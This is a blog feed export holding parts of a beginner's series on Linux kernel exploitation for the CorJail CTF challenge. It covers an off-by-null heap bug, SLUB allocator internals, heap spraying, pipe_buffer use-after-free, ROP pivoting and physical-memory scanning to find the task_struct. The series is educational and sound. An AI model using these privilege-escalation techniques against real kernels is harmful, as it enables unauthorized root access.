<p>Assuming that we can split the leaked <code class="language-plaintext highlighter-rouge">page</code> pointer, the pipe-based physical read primitive can be used to search for the kernel image. According to the documentation of the <code class="language-plaintext highlighter-rouge">RANDOMIZE_BASE</code> configuration option, the virtual and physical base addresses of the kernel image are randomized separately [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/boot/compressed/misc.c#L413">22</a>]. Consequently, our virtual kernel image leak is useless for this task. Furthermore, we know that the kernel can be anywhere between 16 MiB and the top of physical memory, which we take to be 64 GiB, with a worse-case granularity of 2 MiB [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/Kconfig#L2122">23</a>] [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/Kconfig#L2162">24</a>].</p>

<p>This results in about ~30k possible base addresses. The number of read operations can be reduced further by incorporating that the kernel text section alone is usually already larger than 10 MiB. Thus, by reading only every fifth possible physical base, we can derandomize the kernel in about 6k reads, at worst. Afterwards, reading the <code class="language-plaintext highlighter-rouge">page_offset_base</code> variable from the data section finally allows us to convert back and forth between virtual and physical addresses.</p>

<p><em>Aside: If we cannot split the leaked page pointer, we might as well throw a coin, i.e., start searching the kernel base either towards lower or higher physical addresses. As this might lead to invalid accesses beyond the vmemmap region we introduce a 50% probability of failure at this point.</em></p>

<p><em>Aside: While developing the original version of my exploit, I did not pay sufficient attention to this topic. I simply assumed that the leaked physmap pointer is always splittable, which was only true since ASLR was disabled. However, as we saw above the pipe-based exploit flow can still work by first finding the kernel image. Nevertheless, it would still be nice to have ASLR enabled in the development stage to avoid making such mistakes in the future. For debugging, randomization of the kernel image, both physical and virtual, is a pain. Unfortunately, as far as I know, there is no way to selectively enable the randomization of the vmemmap, vmalloc, and page-offset regions. We can help ourselves around that restriction by disabling ASLR on the kernel command line, which will make the boot stub decompress the kernel at the physical address <code class="language-plaintext highlighter-rouge">0x1000000</code> and maps it to the virtual address <code class="language-plaintext highlighter-rouge">0xffffffff81000000</code> [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/Kconfig#L2064">25</a>] [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/boot/compressed/misc.c#L341">26</a>]. After jumping into the decompressed kernel, we can use the debugger to edit the boot parameters to pretend that ASLR is enabled, which will result in the randomization of the other memory regions [<a href="https://github.com/vobst/like-dbg-fork-public/blob/d2d50a5bce3986fe30cd43bf8595825dd7266324/io/scripts/gdb_script_partial_kaslr.py">27</a>]. In the future, it would be nice to automate debugging with full ASLR enabled.</em></p>

<h3 id="finding-our-task-struct">Finding our Task Struct</h3>

<p>With that technicality out of the way, we can start to explore physical memory. An obvious target for a data-only privilege escalation is the <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/sched.h#L648"><code class="language-plaintext highlighter-rouge">task_struct</code></a> of the exploit process, which is the structure that the kernel uses to track all kinds of information needed to run the task. In order to find it, we can leverage the fact that it includes the process’ <code class="language-plaintext highlighter-rouge">comm</code>, which is a 16-byte name that we can set using a <code class="language-plaintext highlighter-rouge">prctl</code> command. Setting the <code class="language-plaintext highlighter-rouge">comm</code> prior to searching reduces the risk of finding a stale task struct of a dead tread. Additionally, it is recommended to perform additional sanity checks on each instance of the name found during the memory scan to ensure that it indeed belongs to our task descriptor, and not to, for example, the page cache entry of our executable or our process’ address space.</p>

<h2 id="wrap-up">Wrap Up</h2>

<p><img src="/media/Linux-S2/roadmap_2.jpg" alt="" /></p>

<p>Constructing an arbitrary free primitive from our UAF in kmalloc-32 allowed us to cause a UAF on a <code class="language-plaintext highlighter-rouge">pipe_buffer</code> array. Afterwards, we explored two ways to capitalize on this. First, we reclaimed the freed slot with a <code class="language-plaintext highlighter-rouge">user_key_payload</code> that contained a fake <code class="language-plaintext highlighter-rouge">pipe_buffer</code> whose destructor was manipulated to trigger a stack pivot into a ROP chain stored in the same buffer. Second, we reclaimed the slot with a tty write buffer, which gave us the freedom to repeatedly overwrite the <code class="language-plaintext highlighter-rouge">pipe_buffer</code>. With a little bit of background on how pipes work, this primitive enabled us to scan physical memory to locate our task descriptor.</p>

<p>In the next post, we will recollect why we are doing this whole exercise. On a conceptual level, the goal is to elevate the privileges of our process, however, as we will discover many mechanisms act together to define what is commonly referred to as a process’ privileges. Our task will be to identify the parameters we need to tweak to perform the privileged action we need to win the challenge, i.e., reading a file in the root users’ home directory. Furthermore, we will learn how to easily experiment with different privilege escalation approaches to develop stable exploit routines, using both, the code execution and the read write primitive.</p>

<h2 id="references">References</h2>

<p>[0] https://blog.eb9f.de/2023/07/20/Linux-S1-E1.html</p>

<p>[1] https://github.com/vobst/ctf-corjail-public</p>

<p>[2] https://github.com/vobst/like-dbg-fork-public</p>

<p>[4] https://elixir.bootlin.com/linux/v5.10.127/source/fs/pipe.c#L806</p>

<p>[5] https://github.com/vobst/ctf-corjail-public/blob/master/sploit.c#L478</p>

<p>[6] https://elixir.bootlin.com/linux/v5.10.127/source/security/keys/user_defined.c#L128</p>

<p>[7] https://pdos.csail.mit.edu/6.S081/2022/readings/rcu-decade-later.pdf</p>

<p>[8] https://elixir.bootlin.com/linux/v5.10.127/source/kernel/sched/membarrier.c#L470</p>

<p>[9] https://github.com/lrh2000/StackRot</p>

<p>[10] https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html</p>

<p>[11] https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html</p>

<p>[12] https://www.youtube.com/watch?v=JRyrhsx-L5Y</p>

<p>[13] https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html</p>

<p>[14] https://support.google.com/faqs/answer/7625886</p>

<p>[15] https://dirtypipe.cm4all.com/</p>

<p>[16] https://lolcads.github.io/posts/2022/06/dirty_pipe_cve_2022_0847/</p>

<p>[17] https://github.com/0xkol/badspin</p>

<p>[18] https://www.interruptlabs.co.uk/articles/pipe-buffer</p>

<p>[19] https://github.com/vobst/ctf-corjail-public/blob/master/libexp/rw_pipe_and_tty.c#L77</p>

<p>[20] https://www.kernel.org/doc/html/v5.10/x86/x86_64/mm.html</p>

<p>[21] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/mm/kaslr.c#L64</p>

<p>[22] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/boot/compressed/misc.c#L413</p>

<p>[23] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/Kconfig#L2122</p>

<p>[24] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/Kconfig#L2162</p>

<p>[25] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/Kconfig#L2064</p>

<p>[26] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/boot/compressed/misc.c#L341</p>

<p>[27] https://github.com/vobst/like-dbg-fork-public/blob/d2d50a5bce3986fe30cd43bf8595825dd7266324/io/scripts/gdb_script_partial_kaslr.py</p>]]></content><author><name></name></author><summary type="html"><![CDATA[_Note: This is the second post in a series on Linux heap exploitation. It assumes that you have read the first part [0]. You can play with the exploit [1] yourself using the kernel debugging setup [2] published alongside this series.]]></summary></entry><entry><title type="html">Linux S1E1: From Off-by-Null to Kernel Pointer Leaks</title><link href="https://blog.eb9f.de/2023/07/20/Linux-S1-E1.html" rel="alternate" type="text/html" title="Linux S1E1: From Off-by-Null to Kernel Pointer Leaks" /><published>2023-07-20T00:00:00+00:00</published><updated>2023-07-20T00:00:00+00:00</updated><id>https://blog.eb9f.de/2023/07/20/Linux-S1-E1</id><content type="html" xml:base="https://blog.eb9f.de/2023/07/20/Linux-S1-E1.html"><![CDATA[<p>About a year ago, I remember watching a video series by LiveOverflow, a security researcher with a well-known Youtube channel, on him “getting into” browser exploitation [<a href="https://www.youtube.com/playlist?list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t">0</a>]. Don’t ask me about any technical details, but what stuck with me is the way he describes how this video series came about; He reflects that he had been interested in the topic for quite a while, regularly annoying experienced researcher with the typical beginner question: “How do I get into it?”, but always just shying away from actually committing to leaning about it - thinking that the topic was too complex, the entry barrier to high.</p>

<p>No clue if that is really what he said in the video, but it is what stuck with me, probably since it was echoing some thoughts of my own; What was browser exploitation for him, was kernel exploitation for me. So, this three-part series is the answer I finally gave to my question “How to get into kernel exploitation?”; Just start somewhere, do not wait for the perfect time, just start - the rest you will pick up along the way.</p>

<p>These posts document how I got started with kernel exploitation. They are written by a beginner for beginners. On the upside this might imply that they provide a resource more accessible than the, often pretty brief, writeups by experienced researchers that gloss over many of the pitfalls that we get caught in. On the downside, however, it means you should take everything I say with a grain of salt. If you spot mistakes, do not hesitate to let me know.</p>

<h2 id="where-to-start">Where to Start?</h2>

<p>LiveOverflow started by analyzing an exploit by a fellow security researcher for a vulnerability that researcher discovered in the SpiderMonkey JavaScript engine. I had no clue where to start, and more or less by chance ended up with a CTF challenge that I read about recently.</p>

<p>Last year’s CorCTF [<a href="https://2022.cor.team/">2</a>] featured the CorJail [<a href="https://github.com/Crusaders-of-Rust/corCTF-2022-public-challenge-archive/tree/master/pwn/corjail">3</a>] challenge, which, if I recall correctly, was only solved by a member of the organizing team. I started by carefully reading the writeup [<a href="https://syst3mfailure.io/corjail/">4</a>] by the challenge author and then got to work.</p>

<h2 id="the-single-most-important-thing">The Single Most Important Thing</h2>

<p>Of course, we will conclude this series with a section on learnings and reflections, however, let me spoiler the most important one up front: get yourself a proper debugging setup.</p>

<p>Luckily for us, the challenge repository contains the kernel configuration and patches used for building the image, and thus I started by recompiling the kernel with all the debugging features I wanted. Then I proceeded with building the root filesystem, modifying it to give myself regular root access before launching the unprivileged shell from which we eventually want to elevate our privileges back again.</p>

<p>Next let us turn to the vulnerable kernel module. Since source code was available, recompiling it with debug information would have been an option, however, it loaded without problems, and we will not spend much time in there anyway.</p>

<p>Finally, we need a way to debug the kernel. I used my fork of the fabulous like-dbg [<a href="https://github.com/0xricksanchez/like-dbg">5</a>] setup, which is a great platform for building your personal kernel debugging and exploit development environment. Importantly, we also need a way to run custom gdb scripts, which can be easily archived using this setup.</p>

<p>With scripts, symbols and source code debugging in place, let us go ahead and dissect the vulnerable kernel module.</p>

<p><em>Aside: You can find a release of the setup on GitHub [<a href="https://github.com/vobst/like-dbg-fork-public">6</a>]. You might want to use it together with the exploit [<a href="https://github.com/vobst/ctf-corjail-public">7</a>] to follow along with the series.</em></p>

<h2 id="exploring-the-challenge">Exploring the Challenge</h2>

<p>Like many other kernel CTF challenges, the rootfs contains a custom kernel module that is loaded on boot. However, I like that it is not just some toy driver whose only purpose is to be exploited; The author actually took a kernel patch that was proposed on the mailing list and split it up into a change to the core kernel and a stand-alone module.</p>

<p>In particular, the kernel patch implements per-cpu syscall counters, and the kernel module exposes them to user space via a file in procfs. We can display the counters by reading from the file and filter the shown system calls by writing to it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@CoROS:~1 cat /proc/cormon

      CPU0      CPU1      CPU2      CPU3        Syscall (NR)

        15        12        26         8        sys_poll (7)
         0         0         0         0        sys_fork (57)
        47        51        71        66        sys_execve (59)
         0         0         0         0        sys_msgget (68)
         0         0         0         0        sys_msgsnd (69)
         0         0         0         0        sys_msgrcv (70)
         0         0         0         0        sys_ptrace (101)
        14         4        19         9        sys_setxattr (188)
        11        23        17        25        sys_keyctl (250)
         0         0         2         0        sys_unshare (272)
         0         0         0         0        sys_execveat (322)

root@CoROS:~2 echo -n 'sys_pipe' &gt; /proc/cormon
[   57.315786] [CoRMon::Debug] Syscalls @ 0xffff888104681000
root@CoROS:~3 cat /proc/cormon

      CPU0      CPU1      CPU2      CPU3        Syscall (NR)

         3        13         3         2        sys_pipe (22)
</code></pre></div></div>

<p>There are few standardized places where auto loaded drivers should be specified, and we find the <code class="language-plaintext highlighter-rouge">cormon</code> driver in <code class="language-plaintext highlighter-rouge">/etc/modules</code>. Loading it into BinaryNinja, we can confirm that on load this module creates a file in the proc pseudo file system {1}.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mo">000004</span><span class="mi">9</span><span class="n">f</span>  <span class="kt">uint64_t</span> <span class="nf">init_module</span><span class="p">()</span>

<span class="mo">000004</span><span class="n">a7</span>      <span class="n">printk</span><span class="p">(</span><span class="mh">0x668</span><span class="p">)</span>
<span class="mo">000004</span><span class="n">cc</span>      <span class="kt">int32_t</span> <span class="n">rbx</span>
<span class="mo">000004</span><span class="n">cc</span>      <span class="k">if</span> <span class="p">(</span><span class="n">proc_create</span><span class="p">(</span><span class="mh">0x5a3</span><span class="p">,</span> <span class="mh">0x1b6</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x750</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>  <span class="p">{</span><span class="s">"cormon"</span><span class="p">}</span> <span class="c1">// {1}</span>
<span class="mo">000004</span><span class="n">d5</span>          <span class="n">printk</span><span class="p">(</span><span class="mh">0x698</span><span class="p">)</span> <span class="c1">// [CoRMon::Error] proc_create() call failed!</span>
<span class="mo">000004</span><span class="n">da</span>          <span class="n">rbx</span> <span class="o">=</span> <span class="o">-</span><span class="mh">0xc</span>
<span class="mo">000004</span><span class="n">ea</span>      <span class="k">else</span>
<span class="mo">000004</span><span class="n">ea</span>          <span class="kt">int32_t</span> <span class="n">rax_2</span> <span class="o">=</span> <span class="n">update_filter</span><span class="p">(</span><span class="n">buffer</span><span class="o">:</span> <span class="s">"sys_execve,sys_execveat,sys_fork…"</span><span class="p">)</span>
<span class="mo">000004</span><span class="n">ef</span>          <span class="n">rbx</span> <span class="o">=</span> <span class="n">rax_2</span>
<span class="mo">000004</span><span class="n">f3</span>          <span class="k">if</span> <span class="p">(</span><span class="n">rax_2</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
<span class="mo">00000503</span>              <span class="n">rbx</span> <span class="o">=</span> <span class="o">-</span><span class="mh">0x16</span>
<span class="mo">000004</span><span class="n">fc</span>          <span class="k">else</span>
<span class="mo">000004</span><span class="n">fc</span>              <span class="n">printk</span><span class="p">(</span><span class="mh">0x6c8</span><span class="p">)</span> <span class="c1">// [CoRMon::Init] Initialization complete!</span>
<span class="mf">000004e2</span>      <span class="k">return</span> <span class="n">zx</span><span class="p">.</span><span class="n">q</span><span class="p">(</span><span class="n">rbx</span><span class="p">)</span>
</code></pre></div></div>
<p>The fourth argument of the call to <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/proc/generic.c#L587"><code class="language-plaintext highlighter-rouge">proc_create</code></a> specifies which functions the kernel will invoke when user space interacts with the file.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mo">00000750</span>  <span class="n">cormon_proc_ops</span><span class="o">:</span>
<span class="mo">00000750</span>  <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span>                          <span class="p">........</span>

<span class="mo">0000075</span><span class="mi">8</span>  <span class="kt">void</span><span class="o">*</span> <span class="n">data_758</span> <span class="o">=</span> <span class="n">cormon_proc_open</span>
<span class="mo">00000760</span>  <span class="kt">void</span><span class="o">*</span> <span class="n">data_760</span> <span class="o">=</span> <span class="n">seq_read</span>

<span class="mo">0000076</span><span class="mi">8</span>                          <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span> <span class="mo">00</span>          <span class="p">........</span>

<span class="mo">00000770</span>  <span class="kt">void</span><span class="o">*</span> <span class="n">data_770</span> <span class="o">=</span> <span class="n">cormon_proc_write</span>
</code></pre></div></div>
<p>The bug is in the write handler <code class="language-plaintext highlighter-rouge">cormon_proc_write</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mo">000003</span><span class="mi">84</span>  <span class="kt">int64_t</span> <span class="n">cormon_proc_write</span><span class="p">(</span><span class="kt">int64_t</span> <span class="n">filp</span><span class="p">,</span> <span class="kt">int64_t</span> <span class="n">buf</span><span class="p">,</span> <span class="kt">int64_t</span> <span class="n">len</span><span class="p">,</span> <span class="kt">int64_t</span><span class="o">*</span> <span class="n">ppos</span><span class="p">)</span>
<span class="p">...</span>
<span class="mo">000003</span><span class="n">b6</span>      <span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="n">u</span><span class="o">&gt;</span> <span class="mh">0x1000</span><span class="p">)</span> <span class="c1">// {2}</span>
<span class="mo">0000044</span><span class="mi">9</span>          <span class="n">bytes_to_copy</span> <span class="o">=</span> <span class="mh">0xfff</span> <span class="c1">// {3.1}</span>
<span class="mo">000003</span><span class="n">bc</span>      <span class="k">else</span>
<span class="mo">000003</span><span class="n">bc</span>          <span class="n">bytes_to_copy</span> <span class="o">=</span> <span class="n">len</span> <span class="c1">// {3.2}</span>
<span class="mo">000003</span><span class="n">d6</span>      <span class="kt">char</span><span class="o">*</span> <span class="n">buffer</span> <span class="o">=</span> <span class="n">kmem_cache_alloc_trace</span><span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">kmalloc_caches</span> <span class="o">+</span> <span class="mh">0x60</span><span class="p">),</span> <span class="mh">0xa20</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">)</span> <span class="c1">// {4}</span>
<span class="p">...</span>
<span class="mo">0000040</span><span class="n">f</span>              <span class="n">__check_object_size</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">bytes_to_copy</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="mo">0000041</span><span class="n">d</span>              <span class="n">bytes_not_copied</span> <span class="o">=</span> <span class="n">_copy_from_user</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">bytes_to_copy</span><span class="p">)</span> <span class="c1">// {5}</span>
<span class="mo">00000425</span>          <span class="k">if</span> <span class="p">(</span><span class="n">bytes_not_copied</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
<span class="mo">0000047</span><span class="mi">8</span>              <span class="n">printk</span><span class="p">(</span><span class="mh">0x630</span><span class="p">)</span>
<span class="mo">0000047</span><span class="n">d</span>              <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="mh">0xe</span>
<span class="mo">00000427</span>          <span class="k">else</span>
<span class="mo">00000427</span>              <span class="n">buffer</span><span class="p">[</span><span class="n">bytes_to_copy</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span> <span class="c1">// {6}</span>
<span class="mo">00000435</span>              <span class="k">if</span> <span class="p">(</span><span class="n">update_filter</span><span class="p">(</span><span class="n">buffer</span><span class="o">:</span> <span class="n">buffer</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
<span class="mo">000004</span><span class="mi">89</span>                  <span class="n">kfree</span><span class="p">(</span><span class="n">buffer</span><span class="p">)</span>
<span class="mo">000004</span><span class="mi">8</span><span class="n">e</span>                  <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="mh">0x16</span>
<span class="mo">0000043</span><span class="n">a</span>              <span class="k">else</span>
<span class="mo">0000043</span><span class="n">a</span>                  <span class="n">kfree</span><span class="p">(</span><span class="n">buffer</span><span class="p">)</span>
<span class="mo">0000043</span><span class="n">f</span>                  <span class="n">err</span> <span class="o">=</span> <span class="n">len</span>
<span class="mo">0000044</span><span class="mi">8</span>      <span class="k">return</span> <span class="n">err</span>
</code></pre></div></div>
<p>Here, <code class="language-plaintext highlighter-rouge">len</code> and <code class="language-plaintext highlighter-rouge">buf</code> are the arguments user space passed to the write system call. At {2} the function validates the length argument, however, there is an obvious inconsistency between the assignments {3.1} and {3.2} when the length is equal to 0x1000. A buffer of fixed size 0x1000 is allocated at {4} and filled with user data at {5}. No buffer overflows occur at this point as <code class="language-plaintext highlighter-rouge">bytes_to_copy</code> is guaranteed to be &lt;= 0x1000. However, the code expects that the truncated user data might not be null-terminated, and an out-of-bounds write of the terminating null byte might occur at {6}.</p>

<p>Summarizing our findings, the primitive granted by the bug is a linear heap overflow of size one where the written data is always a zero byte. Given the fact that our vulnerability involved the heap, it is probably worth the wile to learn a bit about kernel’s memory allocation algorithm.</p>

<h2 id="slub-cash-course">SLUB Cash Course</h2>

<p>For most people interested in exploitation, the first memory allocator that they studied is probably the malloc implementation of glibc. It is a fundamental component of virtually all Linux user space applications and consequently, much research has gone into exploiting it and there is ample literature on the subject.</p>

<p>However, there are many other ways to implement an allocator for small chunks of memory. For example, Android recently switched to using the Scudo allocator, which was developed with a special focus on security [<a href="https://android-developers.googleblog.com/2020/06/system-hardening-in-android-11.html">8</a>] [<a href="https://www.llvm.org/docs/ScudoHardenedAllocator.html">9</a>].</p>

<p>When you leave user space and enter kernel land, things change. First of all, as of this writing, you can still choose between three different allocators at compile time: SLAB, SLUB and SLOB. Luckily, during the 6.4 merge window, that is the 2-week period in a kernel development cycle where disruptive changes can be merged into the kernel, the death of SLOB was decided. Furthermore, the removal of the SLAB allocator is on the to-do list of memory management developers [<a href="https://lwn.net/Articles/932201/">10</a>]. Our challenge’s kernel is using the SLUB allocator, which will hopefully become the only remaining allocator at some point in the future.</p>

<p>Nevertheless, as it is the case with most aspects of the kernel, its allocator can be extensively configured at compile-time. Some aspects may also be configured at boot or run-time. Our discussion will be tailored to the configuration of the challenge’s kernel and I will mention the relevant compile-time definitions along the way.</p>

<p>The first difference between glibc’s malloc and SLUB is that SLUB is a so-called <em>slab-allocator</em>. (Note to avoid confusion: The word slab-allocator refers to a particular design for building memory allocators, which is popular in operating system kernels [<a href="https://en.wikipedia.org/wiki/Slab_allocation">11</a>]. A slab, on the other hand, is a particular component in this design that is not to be confused with SLAB, which is a Linux kernel implementation of a slab-allocator.)</p>

<p>The <em>buffers</em> handed out by such an allocator are taken from contiguous memory ranges (typically between one and sixteen pages in size), which are logically subdivided into fixed size <em>slots</em>. Those memory ranges are called <em>slabs</em>.</p>

<p>Each slab is part of exactly one so-called <em>cache</em>. A cache is nothing but a collection of slabs that all have the same slot size. Allocation requests are always (implicitly or explicitly) made against a specific cache, which might in turn create itself a fresh slab to serve the request.</p>

<p>Here’s my attempt at illustrating the above concepts in a drawing.
<img src="/media/Linux-S1/slab_allocation.jpg" alt="" /></p>

<p>For example, in the Linux kernel there is the <em>kmalloc</em> family of caches. Those caches typically cover slot sizes from 32 to 8192 bytes and for each size there are multiple caches with different characteristics. When you read kernel code and see a call like</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="n">buf</span> <span class="o">=</span> <span class="n">kmalloc</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>
<p>the allocation request will be directed towards a cache of the kmalloc family. However, be aware that when reverse engineering you will not see any calls to <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/slab.h#L538"><code class="language-plaintext highlighter-rouge">kmalloc</code></a> in the disassembly because of compiler inlining. In the <code class="language-plaintext highlighter-rouge">cormon_proc_write</code> function, for example, the source code contains a call to <code class="language-plaintext highlighter-rouge">kmalloc</code> while the above listing shows a call to <a href="https://elixir.bootlin.com/linux/v5.10.127/source/mm/slub.c#L2919"><code class="language-plaintext highlighter-rouge">kmem_cache_alloc_trace</code></a>.</p>

<p>Importantly for us, even same size allocation requests might be served from different caches when the second argument differs. Caches in the kmalloc family are also known as “general purpose” caches, as their buffers are used for many different kinds of objects by the kernel.</p>

<p>The other thing that you will frequently see are allocation requests that are explicitly directed towards a specific cache.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="cm">/* SLAB cache for sighand_struct structures (tsk-&gt;sighand) */</span>
<span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span><span class="n">sighand_cachep</span><span class="p">;</span>
<span class="p">...</span>
<span class="n">newsighand</span> <span class="o">=</span> <span class="n">kmem_cache_alloc</span><span class="p">(</span><span class="n">sighand_cachep</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>
<p>Those caches often hold only objects of a specific type or are only used within a certain module.</p>

<p>The second difference has to do with the fact that the kernel is a highly parallel program with complete control over the hardware. While glibc’s malloc has many features to speed up memory allocations in multi-threaded programs by using per-thread data structures, the kernel is making heavy use of <em>per-CPU</em> data structures to improve the performance of the allocator implementation.</p>

<p>For each <em>cache</em> every logical CPU has its own private set of <em>slabs</em> for serving allocations. Among them, the slab that served the last allocation is the so-called <em>CPU slab</em> for that cache, all others are referred to as <em>partial</em> slabs. Note that the allocator does not track full slabs at all. It only becomes aware of them once one of their objects is freed.</p>

<p>What is more, in computing there is the concept of non-uniform memory access (NUMA) machines, where, while every CPU can access all physical memory, there is a certain region that is “fast” to access. Here, CPUs with the same “fast region“ form so-called NUMA-nodes. As another optimization, each <em>node</em> maintains its own set of <em>per-node</em> partial slabs for every cache.</p>

<p>When severing an allocation request, the cache algorithm first checks the CPU slab. This slab has two freelists, a lockless freelist private to the owning CPU and the normal slab freelist, which might require locking. After checking those two, the partial slabs followed by the per-node partial slabs are consulted. On the way the algorithm opportunistically populates the empty lists from the currently checked one. If no existing slab is found, a new one is created and set as the CPU slab.</p>

<p>During a free operation, the slot is added to the freelist (LIFO) of the slab it belongs to. The only exception is freeing an object in a CPU slab on its owning CPU. In that case the slot goes to the lockless freelist. If the slab was previously full, then the CPU opportunistically adds it to its list of partial or per-node partial slabs. There’s one detail concerning a slab’s freelist worth mentioning at this point: for each slab the order in which its slots appear on its initial freelist is randomized during slab creation. Furthermore, freeing the last object in a partial slab might lead to its destruction if the CPU already has a sufficient number of empty slabs.</p>

<p>Here’s my attempt at illustrating the above concepts in a drawing.
<img src="/media/Linux-S1/per_cpu_alloc.jpeg" alt="" /></p>

<p>Those are the core concepts of the SLUB allocator that are needed to understand the exploit and follow the decisions made. Some further aspects will be introduced along the way once we need them.</p>

<p>However, the topic is of course much richer, and I encourage you to have a look at one of the following references to dive deeper: [<a href="https://blogs.oracle.com/linux/post/linux-slub-allocator-internals-and-debugging-1">12</a>], [<a href="https://events.static.linuxfound.org/sites/events/files/slides/slaballocators.pdf">13</a>], [<a href="https://events.static.linuxfound.org/images/stories/pdf/klf2012_kim.pdf">14</a>]. After reading one or two of them, what helped me was having a look at the code in <code class="language-plaintext highlighter-rouge">mm/slub.c</code> and walking through allocations and frees in a debugger. It might also be instructive to have a look at gdb extensions that implement SLUB debugging [<a href="https://github.com/nccgroup/libslub">15</a>] [<a href="https://github.com/PaoloMonti42/salt">16</a>] (or writing your own) as well as special purpose debugging tools used by kernel developers [<a href="https://www.kernel.org/doc/Documentation/vm/slub.txt">17</a>]. At this point we will end our digression on SLUB internals and apply our newfound knowledge to solve the challenge at hand.</p>

<h2 id="slub-exploitation-crash-course">SLUB Exploitation Crash Course</h2>

<p>In this section, we will discuss the implementation details described above from an exploitation perspective.</p>

<p>Generally, one can distinguish between exploitation techniques that target the heap implementation and those that target the data stored on the heap. We are going to be focusing on the latter.</p>

<p>First, the per-CPU design implies that we must carefully control on which CPU we trigger allocations and frees. For example, when we trigger an arbitrary free while executing on CPU0, it might very well be impossible to reclaim the freed slot by spraying objects from another CPU. That is since the freed slot might end up on the freelist of a slab that is private to CPU0. Fortunately, the kernel lets a process choose the set of CPUs it would like to run on and will be making heavy use of this during our exploit [<a href="https://man7.org/linux/man-pages/man2/sched_setaffinity.2.html">18</a>].</p>

<p>Secondly, we would like to minimize unexpected allocations, i.e., changes to the allocator state that we cannot predict. There are several sources of unexpected allocations, only some of which we can control.</p>

<p>The first category are allocations that are directly caused by our exploit process. For instance, due to system calls or exceptions that we trigger. This is one reason we are using a low-level systems language, C in this case, for writing our exploit program. Doing this gives us a high degree of control over the allocations the kernel performs in the context of our process. One might ask why we do not use a high-level language like Python or Java Script for writing the exploit, and one reason is that here the language runtime would introduce too much noise in the form of unexpected allocations. To further minimize changes to the CPU’s allocator state, we can perform actions that inevitably cause unwanted allocations, like spawning threads or new processes, on another CPU.</p>

<p>The second category are allocations caused by other processes that we are sharing the CPU with. For example, suppose that we start our exploit by allocating a <em>vulnerable</em> object (Note: that being the lingo for an object that “contains” a vulnerability such as an out-of-bounds memory write). Then, our process gets <em>scheduled out</em>, i.e., another process gets to run on the CPU, before we can allocate the <em>victim object</em> (Note: that being the lingo for an object that we would like to “attack” with the vulnerable object, e.g., by overwriting some pointer inside it). The other process might then cause lots of allocations that fill up the slab containing the vulnerable object, shattering our dreams of causing a successful memory corruption once we get the CPU back. To mitigate this risk, we can exploit the fact that the kernel tries to spread load evenly across CPUs and that we can split tasks between independent streams of execution [<a href="https://lwn.net/Articles/793427/">19</a>]. For example, by spraying the victim object from many treads pinned to the same CPU, recall that threads are scheduled independently of each other, we can increase the chance of a successful exploit. In case our main thread gets scheduled out, another thread of ours might get the CPU and successfully allocates the victim object. Furthermore, we can fill the CPUs run queue, that being the list of processes that the scheduler can choose from on a context switch, with processes that yield the CPU in a loop. Yielding means that the task requests to be moved to the back of the run queue. The goal of this exercise is to force the load-balancer to migrate unrelated tasks to other CPUs while maximizing the CPU time of our exploit process. Yet another technique to mitigate the risk of losing the CPU at an inconvenient moment is to measure the time our process spends on and off the CPU before we begin a critical section, i.e., a code segment during which we do not want to have the CPU taken away from us. By performing those measurements, we can begin the critical section directly after we got the CPU back from some other process. The underlying assumption here is that the likelihood of losing the CPU during some next infinitesimal time interval increases  monotonically with the time that we have already had it. Different scheduling classes, scheduling priorities, scheduling parameter, interrupts, preemption, system load, ect. make the exact functional dependence non-trivial and certainly, non-constant, but to me the general assumption still seems justified. However, it would surely be worthwhile to perform some measurements to 